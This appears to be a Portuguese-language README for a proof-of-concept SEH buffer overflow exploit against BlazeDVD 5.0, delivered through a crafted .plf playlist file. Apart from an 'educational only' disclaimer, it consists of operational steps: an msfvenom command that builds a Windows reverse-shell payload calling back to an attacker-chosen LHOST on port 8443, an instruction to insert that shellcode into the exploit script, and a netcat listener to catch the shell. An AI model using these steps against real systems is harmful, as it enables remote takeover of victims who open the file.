
Prova de conceito de exploit de estouro de buffer SEH para BlazeDVD 5.0 via arquivo de playlist .plf manipulado, gerando um payload de reverse shell com msfvenom para pesquisa educacional de segurança.
Exploit de Prova de Conceito (PoC) visando uma vulnerabilidade de estouro de buffer no BlazeDVD versão 5.0 através de um arquivo de playlist .plf manipulado. O exploit utiliza sobrescrita do SEH (Structured Exception Handler) para obter execução de código.
.plfEste código é para fins educacionais e de pesquisa apenas. Qualquer uso indevido deste código pode violar leis locais ou internacionais. Não me responsabilizo por danos causados pelo uso inadequado.
O exploit gera um arquivo .plf malicioso que, quando aberto no BlazeDVD, desencadeia um estouro de buffer e sobrescreve o SEH (Structured Exception Handler), redirecionando a execução para um payload de shell reverso.
Gerar o Shellcode com msfvenom
Use msfvenom para criar um payload de shell reverso em formato raw, evitando caracteres ruins.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
Substitua o shellcode dentro do script do exploit pela saída do msfvenom.
Iniciar Netcat (Listener) Em outro terminal, comece a escutar na porta selecionada 8443:
nc -lvnp 8443
Capturar o Shell Reverso Se bem-sucedido, um shell reverso se conectará ao seu listener.